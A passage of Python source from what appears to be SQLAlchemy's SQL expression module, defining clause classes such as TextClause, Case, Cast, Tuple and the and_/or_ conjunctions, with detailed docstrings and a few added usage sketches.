return 'BindParameter(%r, %r, type_=%r)' % (self.key,
self.value, self.type)
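# Illustrative usage sketch, not part of this module: explicit bindparam() use
# as described in the BindParameter docstring above, producing a named
# placeholder whose value is supplied at execution time.
def _bindparam_usage_sketch():
    from sqlalchemy import bindparam
    from sqlalchemy.sql import column
    expr = column('name') == bindparam('username')
    return str(expr)  # name = :username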
class TypeClause(ClauseElement):
"""Handle a type keyword in a SQL statement.
Used by the ``Case`` statement.
"""
__visit_name__ = 'typeclause'
def __init__(self, type):
self.type = type
class TextClause(Executable, ClauseElement):
"""Represent a literal SQL text fragment.
E.g.::
from sqlalchemy import text
t = text("SELECT * FROM users")
result = connection.execute(t)
The :class:`.Text` construct is produced using the :func:`.text`
function; see that function for full documentation.
.. seealso::
:func:`.text`
"""
__visit_name__ = 'textclause'
_bind_params_regex = re.compile(r'(?<![:\w\x5c]):(\w+)(?!:)', re.UNICODE)
_execution_options = \
Executable._execution_options.union(
{'autocommit': PARSE_AUTOCOMMIT})
@property
def _select_iterable(self):
return (self,)
@property
def selectable(self):
return self
_hide_froms = []
# help in those cases where text() is
# interpreted in a column expression situation
key = _label = _resolve_label = None
_allow_label_resolve = False
def __init__(
self,
text,
bind=None):
self._bind = bind
self._bindparams = {}
def repl(m):
self._bindparams[m.group(1)] = BindParameter(m.group(1))
return ':%s' % m.group(1)
# scan the string and search for bind parameter names, add them
# to the list of bindparams
self.text = self._bind_params_regex.sub(repl, text)
@classmethod
def _create_text(self, text, bind=None, bindparams=None,
typemap=None, autocommit=None):
"""Construct a new :class:`.TextClause` clause, representing
a textual SQL string directly.
E.g.::
from sqlalchemy import text
t = text("SELECT * FROM users")
result = connection.execute(t)
The advantages :func:`.text` provides over a plain string are
backend-neutral support for bind parameters, per-statement
execution options, as well as
bind parameter and result-column typing behavior, allowing
SQLAlchemy type constructs to play a role when executing
a statement that is specified literally. The construct can also
be provided with a ``.c`` collection of column elements, allowing
it to be embedded in other SQL expression constructs as a subquery.
Bind parameters are specified by name, using the format ``:name``.
E.g.::
t = text("SELECT * FROM users WHERE id=:user_id")
result = connection.execute(t, user_id=12)
For SQL statements where a colon is required verbatim, as within
an inline string, use a backslash to escape::
t = text("SELECT * FROM users WHERE name='\\:username'")
The :class:`.TextClause` construct includes methods which can
provide information about the bound parameters as well as the column
values which would be returned from the textual statement, assuming
it's an executable SELECT type of statement. The
:meth:`.TextClause.bindparams` method is used to provide bound
parameter detail, and :meth:`.TextClause.columns` method allows
specification of return columns including names and types::
t = text("SELECT * FROM users WHERE id=:user_id").\\
bindparams(user_id=7).\\
columns(id=Integer, name=String)
for id, name in connection.execute(t):
print(id, name)
The :func:`.text` construct is used internally in cases when
a literal string is specified for part of a larger query, such as
when a string is specified to the :meth:`.Select.where` method of
:class:`.Select`. In those cases, the same
bind parameter syntax is applied::
s = select([users.c.id, users.c.name]).where("id=:user_id")
result = connection.execute(s, user_id=12)
Using :func:`.text` explicitly usually implies the construction
of a full, standalone statement. As such, SQLAlchemy refers
to it as an :class:`.Executable` object, and it supports
the :meth:`Executable.execution_options` method. For example,
a :func:`.text` construct that should be subject to "autocommit"
can be set explicitly so using the
:paramref:`.Connection.execution_options.autocommit` option::
t = text("EXEC my_procedural_thing()").\\
execution_options(autocommit=True)
Note that SQLAlchemy's usual "autocommit" behavior applies to
:func:`.text` constructs implicitly - that is, statements which begin
with a phrase such as ``INSERT``, ``UPDATE``, ``DELETE``,
or a variety of other phrases specific to certain backends, will
be eligible for autocommit if no transaction is in progress.
:param text:
the text of the SQL statement to be created. use ``:<param>``
to specify bind parameters; they will be compiled to their
engine-specific format.
:param autocommit:
Deprecated. Use .execution_options(autocommit=<True|False>)
to set the autocommit option.
:param bind:
an optional connection or engine to be used for this text query.
:param bindparams:
Deprecated. A list of :func:`.bindparam` instances used to
provide information about parameters embedded in the statement.
This argument now invokes the :meth:`.TextClause.bindparams`
method on the construct before returning it. E.g.::
stmt = text("SELECT * FROM table WHERE id=:id",
bindparams=[bindparam('id', value=5, type_=Integer)])
Is equivalent to::
stmt = text("SELECT * FROM table WHERE id=:id").\\
bindparams(bindparam('id', value=5, type_=Integer))
.. deprecated:: 0.9.0 the :meth:`.TextClause.bindparams` method
supersedes the ``bindparams`` argument to :func:`.text`.
:param typemap:
Deprecated. A dictionary mapping the names of columns
represented in the columns clause of a ``SELECT`` statement
to type objects,
which will be used to perform post-processing on columns within
the result set. This parameter now invokes the
:meth:`.TextClause.columns` method, which returns a
:class:`.TextAsFrom` construct that gains a ``.c`` collection and
can be embedded in other expressions. E.g.::
stmt = text("SELECT * FROM table",
typemap={'id': Integer, 'name': String},
)
Is equivalent to::
stmt = text("SELECT * FROM table").columns(id=Integer,
name=String)
Or alternatively::
from sqlalchemy.sql import column
stmt = text("SELECT * FROM table").columns(
column('id', Integer),
column('name', String)
)
.. deprecated:: 0.9.0 the :meth:`.TextClause.columns` method
supersedes the ``typemap`` argument to :func:`.text`.
"""
stmt = TextClause(text, bind=bind)
if bindparams:
stmt = stmt.bindparams(*bindparams)
if typemap:
stmt = stmt.columns(**typemap)
if autocommit is not None:
util.warn_deprecated('autocommit on text() is deprecated. '
'Use .execution_options(autocommit=True)')
stmt = stmt.execution_options(autocommit=autocommit)
return stmt
@_generative
def bindparams(self, *binds, **names_to_values):
"""Establish the values and/or types of bound parameters within
this :class:`.TextClause` construct.
Given a text construct such as::
from sqlalchemy import text
stmt = text("SELECT id, name FROM user WHERE name=:name "
"AND timestamp=:timestamp")
the :meth:`.TextClause.bindparams` method can be used to establish
the initial value of ``:name`` and ``:timestamp``,
using simple keyword arguments::
stmt = stmt.bindparams(name='jack',
timestamp=datetime.datetime(2012, 10, 8, 15, 12, 5))
Where above, new :class:`.BindParameter` objects
will be generated with the names ``name`` and ``timestamp``, and
values of ``jack`` and ``datetime.datetime(2012, 10, 8, 15, 12, 5)``,
respectively. The types will be
inferred from the values given, in this case :class:`.String` and
:class:`.DateTime`.
When specific typing behavior is needed, the positional ``*binds``
argument can be used in which to specify :func:`.bindparam` constructs
directly. These constructs must include at least the ``key``
argument, then an optional value and type::
from sqlalchemy import bindparam
stmt = stmt.bindparams(
bindparam('name', value='jack', type_=String),
bindparam('timestamp', type_=DateTime)
)
Above, we specified the type of :class:`.DateTime` for the
``timestamp`` bind, and the type of :class:`.String` for the ``name``
bind. In the case of ``name`` we also set the default value of
``"jack"``.
Additional bound parameters can be supplied at statement execution
time, e.g.::
result = connection.execute(stmt,
timestamp=datetime.datetime(2012, 10, 8, 15, 12, 5))
The :meth:`.TextClause.bindparams` method can be called repeatedly,
where it will re-use existing :class:`.BindParameter` objects to add
new information. For example, we can call
:meth:`.TextClause.bindparams` first with typing information, and a
second time with value information, and it will be combined::
stmt = text("SELECT id, name FROM user WHERE name=:name "
"AND timestamp=:timestamp")
stmt = stmt.bindparams(
bindparam('name', type_=String),
bindparam('timestamp', type_=DateTime)
)
stmt = stmt.bindparams(
name='jack',
timestamp=datetime.datetime(2012, 10, 8, 15, 12, 5)
)
.. versionadded:: 0.9.0 The :meth:`.TextClause.bindparams` method
supersedes the argument ``bindparams`` passed to
:func:`~.expression.text`.
"""
self._bindparams = new_params = self._bindparams.copy()
for bind in binds:
try:
existing = new_params[bind.key]
except KeyError:
raise exc.ArgumentError(
"This text() construct doesn't define a "
"bound parameter named %r" % bind.key)
else:
new_params[existing.key] = bind
for key, value in names_to_values.items():
try:
existing = new_params[key]
except KeyError:
raise exc.ArgumentError(
"This text() construct doesn't define a "
"bound parameter named %r" % key)
else:
new_params[key] = existing._with_value(value)
@util.dependencies('sqlalchemy.sql.selectable')
def columns(self, selectable, *cols, **types):
"""Turn this :class:`.TextClause` object into a :class:`.TextAsFrom`
object that can be embedded into another statement.
This function essentially bridges the gap between an entirely
textual SELECT statement and the SQL expression language concept
of a "selectable"::
from sqlalchemy.sql import column, text
stmt = text("SELECT id, name FROM some_table")
stmt = stmt.columns(column('id'), column('name')).alias('st')
stmt = select([mytable]).\\
select_from(
mytable.join(stmt, mytable.c.name == stmt.c.name)
).where(stmt.c.id > 5)
Above, we used untyped :func:`.column` elements. These can also have
types specified, which will impact how the column behaves in
expressions as well as determining result set behavior::
stmt = text("SELECT id, name, timestamp FROM some_table")
stmt = stmt.columns(
column('id', Integer),
column('name', Unicode),
column('timestamp', DateTime)
)
for id, name, timestamp in connection.execute(stmt):
print(id, name, timestamp)
Keyword arguments allow just the names and types of columns to be
specified, where the :func:`.column` elements will be generated
automatically::
stmt = text("SELECT id, name, timestamp FROM some_table")
stmt = stmt.columns(
id=Integer,
name=Unicode,
timestamp=DateTime
)
for id, name, timestamp in connection.execute(stmt):
print(id, name, timestamp)
The :meth:`.TextClause.columns` method provides a direct
route to calling :meth:`.FromClause.alias` as well as
:meth:`.SelectBase.cte` against a textual SELECT statement::
stmt = stmt.columns(id=Integer, name=String).cte('st')
stmt = select([sometable]).where(sometable.c.id == stmt.c.id)
.. versionadded:: 0.9.0 :func:`.text` can now be converted into a
fully featured "selectable" construct using the
:meth:`.TextClause.columns` method. This method supersedes the
``typemap`` argument to :func:`.text`.
"""
input_cols = [
ColumnClause(col.key, types.pop(col.key))
if col.key in types
else col
for col in cols
] + [ColumnClause(key, type_) for key, type_ in types.items()]
return selectable.TextAsFrom(self, input_cols)
@property
def type(self):
return type_api.NULLTYPE
@property
def comparator(self):
return self.type.comparator_factory(self)
def self_group(self, against=None):
if against is operators.in_op:
return Grouping(self)
else:
return self
def _copy_internals(self, clone=_clone, **kw):
self._bindparams = dict((b.key, clone(b, **kw))
for b in self._bindparams.values())
def get_children(self, **kwargs):
return list(self._bindparams.values())
def compare(self, other):
return isinstance(other, TextClause) and other.text == self.text
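# Illustrative usage sketch (editor's addition, not part of the original
# module): combines text() with .bindparams() and .columns() as described in
# the docstrings above. The "users" table and its columns are assumptions made
# only for this example; nothing is executed, only expression objects are built.
def _example_textclause_usage():
    from sqlalchemy import text, bindparam, Integer, String
    stmt = text("SELECT id, name FROM users WHERE name = :name")
    stmt = stmt.bindparams(bindparam('name', value='jack', type_=String))
    # .columns() turns the raw text into a selectable with a .c collection
    return stmt.columns(id=Integer, name=String)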
class Null(ColumnElement):
"""Represent the NULL keyword in a SQL statement.
:class:`.Null` is accessed as a constant via the
:func:`.null` function.
"""
__visit_name__ = 'null'
@util.memoized_property
def type(self):
return type_api.NULLTYPE
@classmethod
def _instance(cls):
"""Return a constant :class:`.Null` construct."""
return Null()
def compare(self, other):
return isinstance(other, Null)
class False_(ColumnElement):
"""Represent the ``false`` keyword, or equivalent, in a SQL statement.
:class:`.False_` is accessed as a constant via the
:func:`.false` function.
"""
__visit_name__ = 'false'
@util.memoized_property
def type(self):
return type_api.BOOLEANTYPE
def _negate(self):
return True_()
@classmethod
def _instance(cls):
"""Return a :class:`.False_` construct.
E.g.::
>>> from sqlalchemy import false
>>> print select([t.c.x]).where(false())
SELECT x FROM t WHERE false
A backend which does not support true/false constants will render as
an expression against 1 or 0::
>>> print select([t.c.x]).where(false())
SELECT x FROM t WHERE 0 = 1
The :func:`.true` and :func:`.false` constants also feature
"short circuit" operation within an :func:`.and_` or :func:`.or_`
conjunction::
>>> print select([t.c.x]).where(or_(t.c.x > 5, true()))
SELECT x FROM t WHERE true
>>> print select([t.c.x]).where(and_(t.c.x > 5, false()))
SELECT x FROM t WHERE false
.. versionchanged:: 0.9 :func:`.true` and :func:`.false` feature
better integrated behavior within conjunctions and on dialects
that don't support true/false constants.
.. seealso::
:func:`.true`
"""
return False_()
def compare(self, other):
return isinstance(other, False_)
class True_(ColumnElement):
"""Represent the ``true`` keyword, or equivalent, in a SQL statement.
:class:`.True_` is accessed as a constant via the
:func:`.true` function.
"""
__visit_name__ = 'true'
@util.memoized_property
def type(self):
return type_api.BOOLEANTYPE
def _negate(self):
return False_()
@classmethod
def _ifnone(cls, other):
if other is None:
return cls._instance()
else:
return other
@classmethod
def _instance(cls):
"""Return a constant :class:`.True_` construct.
E.g.::
>>> from sqlalchemy import true
>>> print select([t.c.x]).where(true())
SELECT x FROM t WHERE true
A backend which does not support true/false constants will render as
an expression against 1 or 0::
>>> print select([t.c.x]).where(true())
SELECT x FROM t WHERE 1 = 1
The :func:`.true` and :func:`.false` constants also feature
"short circuit" operation within an :func:`.and_` or :func:`.or_`
conjunction::
>>> print select([t.c.x]).where(or_(t.c.x > 5, true()))
SELECT x FROM t WHERE true
>>> print select([t.c.x]).where(and_(t.c.x > 5, false()))
SELECT x FROM t WHERE false
.. versionchanged:: 0.9 :func:`.true` and :func:`.false` feature
better integrated behavior within conjunctions and on dialects
that don't support true/false constants.
.. seealso::
:func:`.false`
"""
return True_()
def compare(self, other):
return isinstance(other, True_)
class ClauseList(ClauseElement):
"""Describe a list of clauses, separated by an operator.
By default, it is comma-separated, such as a column listing.
"""
__visit_name__ = 'clauselist'
def __init__(self, *clauses, **kwargs):
self.operator = kwargs.pop('operator', operators.comma_op)
self.group = kwargs.pop('group', True)
self.group_contents = kwargs.pop('group_contents', True)
text_converter = kwargs.pop(
'_literal_as_text',
_expression_literal_as_text)
if self.group_contents:
self.clauses = [
text_converter(clause).self_group(against=self.operator)
for clause in clauses]
else:
self.clauses = [
text_converter(clause)
for clause in clauses]
def __iter__(self):
return iter(self.clauses)
def __len__(self):
return len(self.clauses)
@property
def _select_iterable(self):
return iter(self)
def append(self, clause):
if self.group_contents:
self.clauses.append(_literal_as_text(clause).
self_group(against=self.operator))
else:
self.clauses.append(_literal_as_text(clause))
def _copy_internals(self, clone=_clone, **kw):
self.clauses = [clone(clause, **kw) for clause in self.clauses]
def get_children(self, **kwargs):
return self.clauses
@property
def _from_objects(self):
return list(itertools.chain(*[c._from_objects for c in self.clauses]))
def self_group(self, against=None):
if self.group and operators.is_precedent(self.operator, against):
return Grouping(self)
else:
return self
def compare(self, other, **kw):
"""Compare this :class:`.ClauseList` to the given :class:`.ClauseList`,
including a comparison of all the clause items.
"""
if not isinstance(other, ClauseList) and len(self.clauses) == 1:
return self.clauses[0].compare(other, **kw)
elif isinstance(other, ClauseList) and \
len(self.clauses) == len(other.clauses):
for i in range(0, len(self.clauses)):
if not self.clauses[i].compare(other.clauses[i], **kw):
return False
else:
return self.operator == other.operator
else:
return False
class BooleanClauseList(ClauseList, ColumnElement):
__visit_name__ = 'clauselist'
def __init__(self, *arg, **kw):
raise NotImplementedError(
"BooleanClauseList has a private constructor")
@classmethod
def _construct(cls, operator, continue_on, skip_on, *clauses, **kw):
convert_clauses = []
clauses = [
_expression_literal_as_text(clause)
for clause in
util.coerce_generator_arg(clauses)
]
for clause in clauses:
if isinstance(clause, continue_on):
continue
elif isinstance(clause, skip_on):
return clause.self_group(against=operators._asbool)
convert_clauses.append(clause)
if len(convert_clauses) == 1:
return convert_clauses[0].self_group(against=operators._asbool)
elif not convert_clauses and clauses:
return clauses[0].self_group(against=operators._asbool)
convert_clauses = [c.self_group(against=operator)
for c in convert_clauses]
self = cls.__new__(cls)
self.clauses = convert_clauses
self.group = True
self.operator = operator
self.group_contents = True
self.type = type_api.BOOLEANTYPE
return self
@classmethod
def and_(cls, *clauses):
"""Produce a conjunction of expressions joined by ``AND``.
E.g.::
from sqlalchemy import and_
stmt = select([users_table]).where(
and_(
users_table.c.name == 'wendy',
users_table.c.enrolled == True
)
)
The :func:`.and_` conjunction is also available using the
Python ``&`` operator (though note that compound expressions
need to be parenthesized in order to function with Python
operator precedence behavior)::
stmt = select([users_table]).where(
(users_table.c.name == 'wendy') &
(users_table.c.enrolled == True)
)
The :func:`.and_` operation is also implicit in some cases;
the :meth:`.Select.where` method for example can be invoked multiple
times against a statement, which will have the effect of each
clause being combined using :func:`.and_`::
stmt = select([users_table]).\\
where(users_table.c.name == 'wendy').\\
where(users_table.c.enrolled == True)
.. seealso::
:func:`.or_`
"""
return cls._construct(operators.and_, True_, False_, *clauses)
@classmethod
def or_(cls, *clauses):
"""Produce a conjunction of expressions joined by ``OR``.
E.g.::
from sqlalchemy import or_
stmt = select([users_table]).where(
or_(
users_table.c.name == 'wendy',
users_table.c.name == 'jack'
)
)
The :func:`.or_` conjunction is also available using the
Python ``|`` operator (though note that compound expressions
need to be parenthesized in order to function with Python
operator precedence behavior)::
stmt = select([users_table]).where(
(users_table.c.name == 'wendy') |
(users_table.c.name == 'jack')
)
.. seealso::
:func:`.and_`
"""
return cls._construct(operators.or_, False_, True_, *clauses)
@property
def _select_iterable(self):
return (self, )
def self_group(self, against=None):
if not self.clauses:
return self
else:
return super(BooleanClauseList, self).self_group(against=against)
def _negate(self):
return ClauseList._negate(self)
and_ = BooleanClauseList.and_
or_ = BooleanClauseList.or_
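# Illustrative sketch (editor's addition): and_() / or_() composing a WHERE
# clause, per the BooleanClauseList docstrings above. `users_table` mirrors the
# hypothetical table used in those docstrings and is created here only so the
# example is self-contained; str() compiles against the default dialect.
def _example_and_or_usage():
    from sqlalchemy import table, column, select, and_, or_
    users_table = table('users', column('name'), column('enrolled'))
    stmt = select([users_table]).where(
        or_(
            and_(users_table.c.name == 'wendy',
                 users_table.c.enrolled == True),
            users_table.c.name == 'jack'
        )
    )
    return str(stmt)  # SELECT ... WHERE (name = :name_1 AND ...) OR name = :name_2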
class Tuple(ClauseList, ColumnElement):
"""Represent a SQL tuple."""
def __init__(self, *clauses, **kw):
"""Return a :class:`.Tuple`.
Main usage is to produce a composite IN construct::
from sqlalchemy import tuple_
tuple_(table.c.col1, table.c.col2).in_(
[(1, 2), (5, 12), (10, 19)]
)
.. warning::
The composite IN construct is not supported by all backends,
and is currently known to work on Postgresql and MySQL,
but not SQLite. Unsupported backends will raise
a subclass of :class:`~sqlalchemy.exc.DBAPIError` when such
an expression is invoked.
"""
clauses = [_literal_as_binds(c) for c in clauses]
self._type_tuple = [arg.type for arg in clauses]
self.type = kw.pop('type_', self._type_tuple[0]
if self._type_tuple else type_api.NULLTYPE)
super(Tuple, self).__init__(*clauses, **kw)
@property
def _select_iterable(self):
return (self, )
def _bind_param(self, operator, obj):
return Tuple(*[
BindParameter(None, o, _compared_to_operator=operator,
_compared_to_type=type_, unique=True)
for o, type_ in zip(obj, self._type_tuple)
]).self_group()
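# Illustrative sketch (editor's addition): the composite IN construct built by
# tuple_(), per the Tuple docstring above. The table and value pairs are
# assumptions made only for the example.
def _example_tuple_in():
    from sqlalchemy import table, column, tuple_
    t = table('t', column('col1'), column('col2'))
    expr = tuple_(t.c.col1, t.c.col2).in_([(1, 2), (5, 12), (10, 19)])
    # compiles roughly as: (t.col1, t.col2) IN ((:param_1, :param_2), ...)
    return str(expr)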
class Case(ColumnElement):
"""Represent a ``CASE`` expression.
:class:`.Case` is produced using the :func:`.case` factory function,
as in::
from sqlalchemy import case
stmt = select([users_table]).\\
where(
case(
[
(users_table.c.name == 'wendy', 'W'),
(users_table.c.name == 'jack', 'J')
],
else_='E'
)
)
Details on :class:`.Case` usage are at :func:`.case`.
.. seealso::
:func:`.case`
"""
__visit_name__ = 'case'
def __init__(self, whens, value=None, else_=None):
"""Produce a ``CASE`` expression.
The ``CASE`` construct in SQL is a conditional object that
acts somewhat analogously to an "if/then" construct in other
languages. It returns an instance of :class:`.Case`.
:func:`.case` in its usual form is passed a list of "when"
constructs, that is, a list of conditions and results as tuples::
from sqlalchemy import case
stmt = select([users_table]).\\
where(
case(
[
(users_table.c.name == 'wendy', 'W'),
(users_table.c.name == 'jack', 'J')
],
else_='E'
)
)
The above statement will produce SQL resembling::
SELECT id, name FROM user
WHERE CASE
WHEN (name = :name_1) THEN :param_1
WHEN (name = :name_2) THEN :param_2
ELSE :param_3
END
When simple equality expressions of several values against a single
parent column are needed, :func:`.case` also has a "shorthand" format
used via the
:paramref:`.case.value` parameter, which is passed a column
expression to be compared. In this form, the :paramref:`.case.whens`
parameter is passed as a dictionary containing expressions to be
compared against keyed to result expressions. The statement below is
equivalent to the preceding statement::
stmt = select([users_table]).\\
where(
case(
{"wendy": "W", "jack": "J"},
value=users_table.c.name,
else_='E'
)
)
The values which are accepted as result values in
:paramref:`.case.whens` as well as with :paramref:`.case.else_` are
coerced from Python literals into :func:`.bindparam` constructs.
SQL expressions, e.g. :class:`.ColumnElement` constructs, are accepted
as well. To coerce a literal string expression into a constant
expression rendered inline, use the :func:`.literal_column` construct,
as in::
from sqlalchemy import case, literal_column
case(
[
(
orderline.c.qty > 100,
literal_column("'greaterthan100'")
),
(
orderline.c.qty > 10,
literal_column("'greaterthan10'")
)
],
else_=literal_column("'lessthan10'")
)
The above will render the given constants without using bound
parameters for the result values (but still for the comparison
values), as in::
CASE
WHEN (orderline.qty > :qty_1) THEN 'greaterthan100'
WHEN (orderline.qty > :qty_2) THEN 'greaterthan10'
ELSE 'lessthan10'
END
:param whens: The criteria to be compared against,
:paramref:`.case.whens` accepts two different forms, based on
whether or not :paramref:`.case.value` is used.
In the first form, it accepts a list of 2-tuples; each 2-tuple
consists of ``(<sql expression>, <value>)``, where the SQL
expression is a boolean expression and "value" is a resulting value,
e.g.::
case([
(users_table.c.name == 'wendy', 'W'),
(users_table.c.name == 'jack', 'J')
])
In the second form, it accepts a Python dictionary of comparison
values mapped to a resulting value; this form requires
:paramref:`.case.value` to be present, and values will be compared
using the ``==`` operator, e.g.::
case(
{"wendy": "W", "jack": "J"},
value=users_table.c.name
)
:param value: An optional SQL expression which will be used as a
fixed "comparison point" for candidate values within a dictionary
passed to :paramref:`.case.whens`.
:param else\_: An optional SQL expression which will be the evaluated
result of the ``CASE`` construct if all expressions within
:paramref:`.case.whens` evaluate to false. When omitted, most
databases will produce a result of NULL if none of the "when"
expressions evaluate to true.
"""
try:
whens = util.dictlike_iteritems(whens)
except TypeError:
pass
if value is not None:
whenlist = [
(_literal_as_binds(c).self_group(),
_literal_as_binds(r)) for (c, r) in whens
]
else:
whenlist = [
(_no_literals(c).self_group(),
_literal_as_binds(r)) for (c, r) in whens
]
if whenlist:
type_ = list(whenlist[-1])[-1].type
else:
type_ = None
if value is None:
self.value = None
else:
self.value = _literal_as_binds(value)
self.type = type_
self.whens = whenlist
if else_ is not None:
self.else_ = _literal_as_binds(else_)
else:
self.else_ = None
def _copy_internals(self, clone=_clone, **kw):
if self.value is not None:
self.value = clone(self.value, **kw)
self.whens = [(clone(x, **kw), clone(y, **kw))
for x, y in self.whens]
if self.else_ is not None:
self.else_ = clone(self.else_, **kw)
def get_children(self, **kwargs):
if self.value is not None:
yield self.value
for x, y in self.whens:
yield x
yield y
if self.else_ is not None:
yield self.else_
@property
def _from_objects(self):
return list(itertools.chain(*[x._from_objects for x in
self.get_children()]))
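# Illustrative sketch (editor's addition): both forms of case() from the
# docstring above, compiled without a database. `users_table` is an assumption
# made for the example.
def _example_case_usage():
    from sqlalchemy import table, column, case
    users_table = table('users', column('id'), column('name'))
    plain = case(
        [(users_table.c.name == 'wendy', 'W'),
         (users_table.c.name == 'jack', 'J')],
        else_='E')
    shorthand = case(
        {"wendy": "W", "jack": "J"},
        value=users_table.c.name,
        else_='E')
    return str(plain), str(shorthand)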
def literal_column(text, type_=None):
"""Produce a :class:`.ColumnClause` object that has the
:paramref:`.column.is_literal` flag set to True.
:func:`.literal_column` is similar to :func:`.column`, except that
it is more often used as a "standalone" column expression that renders
exactly as stated; while :func:`.column` stores a string name that
will be assumed to be part of a table and may be quoted as such,
:func:`.literal_column` can be that, or any other arbitrary column-oriented
expression.
:param text: the text of the expression; can be any SQL expression.
Quoting rules will not be applied. To specify a column-name expression
which should be subject to quoting rules, use the :func:`column`
function.
:param type\_: an optional :class:`~sqlalchemy.types.TypeEngine`
object which will
provide result-set translation and additional expression semantics for
this column. If left as None the type will be NullType.
.. seealso::
:func:`.column`
:func:`.text`
:ref:`sqlexpression_literal_column`
"""
return ColumnClause(text, type_=type_, is_literal=True)
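# Illustrative sketch (editor's addition): the contrast the docstring above
# draws between column() (treated as a column name, subject to quoting) and
# literal_column() (rendered exactly as given). Names are examples only.
def _example_literal_column():
    from sqlalchemy import select, column, literal_column
    quoted = column("user name")               # quoted like an identifier
    verbatim = literal_column("'a constant'")  # rendered exactly as written
    return str(select([quoted, verbatim]))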
class Cast(ColumnElement):
"""Represent a ``CAST`` expression.
:class:`.Cast` is produced using the :func:`.cast` factory function,
as in::
from sqlalchemy import cast, Numeric
stmt = select([
cast(product_table.c.unit_price, Numeric(10, 4))
])
Details on :class:`.Cast` usage are at :func:`.cast`.
.. seealso::
:func:`.cast`
"""
__visit_name__ = 'cast'
def __init__(self, expression, type_):
"""Produce a ``CAST`` expression.
:func:`.cast` returns an instance of :class:`.Cast`.
E.g.::
from sqlalchemy import cast, Numeric
stmt = select([
cast(product_table.c.unit_price, Numeric(10, 4))
])
The above statement will produce SQL resembling::
SELECT CAST(unit_price AS NUMERIC(10, 4)) FROM product
The :func:`.cast` function performs two distinct functions when
used. The first is that it renders the ``CAST`` expression within
the resulting SQL string. The second is that it associates the given
type (e.g. :class:`.TypeEngine` class or instance) with the column
expression on the Python side, which means the expression will take
on the expression operator behavior associated with that type,
as well as the bound-value handling and result-row-handling behavior
of the type.
.. versionchanged:: 0.9.0 :func:`.cast` now applies the given type
to the expression such that it takes effect on the bound-value,
e.g. the Python-to-database direction, in addition to the
result handling, e.g. database-to-Python, direction.
An alternative to :func:`.cast` is the :func:`.type_coerce` function.
This function performs the second task of associating an expression
with a specific type, but does not render the ``CAST`` expression
in SQL.
:param expression: A SQL expression, such as a :class:`.ColumnElement`
expression or a Python string which will be coerced into a bound
literal value.
:param type_: A :class:`.TypeEngine` class or instance indicating
the type to which the ``CAST`` should apply.
.. seealso::
:func:`.type_coerce` - Python-side type coercion without emitting
CAST.
"""
self.type = type_api.to_instance(type_)
self.clause = _literal_as_binds(expression, type_=self.type)
self.typeclause = TypeClause(self.type)
def _copy_internals(self, clone=_clone, **kw):
self.clause = clone(self.clause, **kw)
self.typeclause = clone(self.typeclause, **kw)
def get_children(self, **kwargs):
return self.clause, self.typeclause
@property
def _from_objects(self):
return self.clause._from_objects
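# Illustrative sketch (editor's addition): cast() applied to a column, as in
# the docstring above; `product_table` is an assumption for the example.
def _example_cast_usage():
    from sqlalchemy import table, column, select, cast, Numeric
    product_table = table('product', column('unit_price'))
    stmt = select([cast(product_table.c.unit_price, Numeric(10, 4))])
    # compiles to SQL resembling:
    # SELECT CAST(product.unit_price AS NUMERIC(10, 4)) ... FROM product
    return str(stmt)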
class Extract(ColumnElement):
"""Represent a SQL EXTRACT clause, ``extract(field FROM expr)``."""
__visit_name__ = 'extract'
def __init__(self, field, expr, **kwargs):
"""Return a :class:`.Extract` construct.
This is typically available as :func:`.extract`
as well as ``func.extract`` from the
:data:`.func` namespace.
"""
self.type = type_api.INTEGERTYPE
self.field = field
self.expr = _literal_as_binds(expr, None)
def _copy_internals(self, clone=_clone, **kw):
self.expr = clone(self.expr, **kw)
def get_children(self, **kwargs):
return self.expr,
@property
def _from_objects(self):
return self.expr._from_objects
class _label_reference(ColumnElement):
"""Wrap a column expression as it appears in a 'reference' context.
This is any expression that includes an _order_by_label_element,
which is a Label, or a DESC / ASC construct wrapping a Label.
The production of _label_reference() should occur when an expression
is added to this context; this includes the ORDER BY or GROUP BY of a
SELECT statement, as well as a few other places, such as the ORDER BY
within an OVER clause.
"""
__visit_name__ = 'label_reference'
def __init__(self, element):
self.element = element
def _copy_internals(self, clone=_clone, **kw):
self.element = clone(self.element, **kw)
@property
def _from_objects(self):
return ()
class _textual_label_reference(ColumnElement):
__visit_name__ = 'textual_label_reference'
def __init__(self, element):
self.element = element
@util.memoized_property
def _text_clause(self):
return TextClause._create_text(self.element)
class UnaryExpression(ColumnElement):
"""Define a 'unary' expression.
A unary expression has a single column expression
and an operator. The operator can be placed on the left
(where it is called the 'operator') or right (where it is called the
'modifier') of the column expression.
:class:`.UnaryExpression` is the basis for several unary operators
including those used by :func:`.desc`, :func:`.asc`, :func:`.distinct`,
:func:`.nullsfirst` and :func:`.nullslast`.
"""
__visit_name__ = 'unary'
def __init__(self, element, operator=None, modifier=None,
type_=None, negate=None, wraps_column_expression=False):
self.operator = operator
self.modifier = modifier
self.element = element.self_group(
against=self.operator or self.modifier)
self.type = type_api.to_instance(type_)
self.negate = negate
self.wraps_column_expression = wraps_column_expression
@classmethod
def _create_nullsfirst(cls, column):
"""Produce the ``NULLS FIRST`` modifier for an ``ORDER BY`` expression.
:func:`.nullsfirst` is intended to modify the expression produced
by :func:`.asc` or :func:`.desc`, and indicates how NULL values
should be handled when they are encountered during ordering::
from sqlalchemy import desc, nullsfirst
stmt = select([users_table]).\\
order_by(nullsfirst(desc(users_table.c.name)))
The SQL expression from the above would resemble::
SELECT id, name FROM user ORDER BY name DESC NULLS FIRST
Like :func:`.asc` and :func:`.desc`, :func:`.nullsfirst` is typically
invoked from the column expression itself using
:meth:`.ColumnElement.nullsfirst`, rather than as its standalone
function version, as in::
stmt = (select([users_table]).
order_by(users_table.c.name.desc().nullsfirst())
)
.. seealso::
:func:`.asc`
:func:`.desc`
:func:`.nullslast`
:meth:`.Select.order_by`
"""
return UnaryExpression(
_literal_as_label_reference(column),
modifier=operators.nullsfirst_op,
wraps_column_expression=False)
@classmethod
def _create_nullslast(cls, column):
"""Produce the ``NULLS LAST`` modifier for an ``ORDER BY`` expression.
:func:`.nullslast` is intended to modify the expression produced
by :func:`.asc` or :func:`.desc`, and indicates how NULL values
should be handled when they are encountered during ordering::
from sqlalchemy import desc, nullslast
stmt = select([users_table]).\\
order_by(nullslast(desc(users_table.c.name)))
The SQL expression from the above would resemble::
SELECT id, name FROM user ORDER BY name DESC NULLS LAST
Like :func:`.asc` and :func:`.desc`, :func:`.nullslast` is typically
invoked from the column expression itself using
:meth:`.ColumnElement.nullslast`, rather than as its standalone
function version, as in::
stmt = select([users_table]).\\
order_by(users_table.c.name.desc().nullslast())
